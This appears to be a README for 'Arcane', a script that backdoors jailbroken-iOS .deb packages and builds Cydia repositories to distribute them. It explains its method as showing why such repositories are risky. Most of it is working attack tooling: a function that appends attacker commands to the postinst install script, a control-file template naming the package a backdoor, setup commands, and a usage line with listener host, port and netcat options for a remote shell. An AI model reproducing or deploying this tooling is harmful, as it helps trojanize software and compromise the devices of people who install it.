Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessary resources for APT repositories. It was created for this publication to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.
How Arcane Works?
To understand what’s happening in the GIF, decompress a package created with Arcane.
dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp
postinst files in the
DEBIAN directory. Both files are important.
│ ├── control
│ └── postinst
It’s possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files. Arcane takes advantage of the
postinst file to execute commands during the installation.
#The “post-installation” file. This file is generally responsible for executing commands on the OS after installing the required files. It’s utilized by developers to manage and maintain various aspects of an installation. Arcane abuses this functionality by appending malicious Bash commands to the file.
#A function to handle the type of command execution embedded into the postinst file.
function inject_backdoor ()
# If –file is used,
cat the command(s) into the postinst file.
if [[ “$infile” ]]; then
cat “$infile” >> “$postinst”;
# If no –file, utilize the simple Bash payload, previously
echo -e “$payload” >> “$postinst”;
embed=”generic shell command”;
status “embedded $embed into postinst” “error embedding backdoor”;
chmod 0755 “$postinst”
The control file contains values that package management tools use when installing packages. Arcane will either modify an existing
control or create it.
#The “control” file template. Most iOS packages will include a control file. In the event one is not found, Arcane will use the below template. The
$hacker variable is used here to occupy various arbitrary fields.
Name: $hacker backdoor
Description: A backdoored iOS package
Author: $hacker https://$hacker.github.io/
Maintainer: $hacker https://$hacker.github.io/“;
if statement to check for the control file.
if [[ ! -f “$tmp/DEBIAN/control” ]]; then
# If no control is detected, create it using the template.
echo “$controlTemp” > “$tmp/DEBIAN/control”;
status “created control file” “error with control template”;
# If a control file exists, Arcane will simply rename the package
# as it appears in the list of available Cydia applications. This
# makes the package easier to location in Cydia.
msg “detected control file” succ;
sed -i ‘0,/^Name:.*/s//Name: $hacker backdoor/’ “$tmp/DEBIAN/control”;
status “modified control file” “error with control”;
Clone the repository in Kali v2020.3.
#sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies
#sudo git clone https://github.com/tokyoneon/arcane /opt/arcane
#sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane
#chmod +x arcane.sh;./arcane.sh –help
Embed a command into a given package. See article for more info.
./arcane.sh –input samples/sed_4.5-1_iphoneos-arm.deb –lhost –lport <4444> –cydia –netcat
The repo includes packages for testing.
#ls -la samples/
#-rw-r–r– 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_126.96.36.199-1_iphoneos-arm.deb
#-rw-r–r– 1 root root 142520 Jul 22 06:21 network-cmds_543-1_iphoneos-arm.deb
#-rw-r–r– 1 root root 76688 Aug 29 2018 sed_4.5-1_iphoneos-arm.deb
#-rw-r–r– 1 root root 60866 Jul 8 21:03 top_39-2_iphoneos-arm.deb
#-rw-r–r– 1 root root 13810 Aug 29 2018 whois_5.3.2-1_iphoneos-arm.deb
MD5 sums, as found on the official Bingner repository.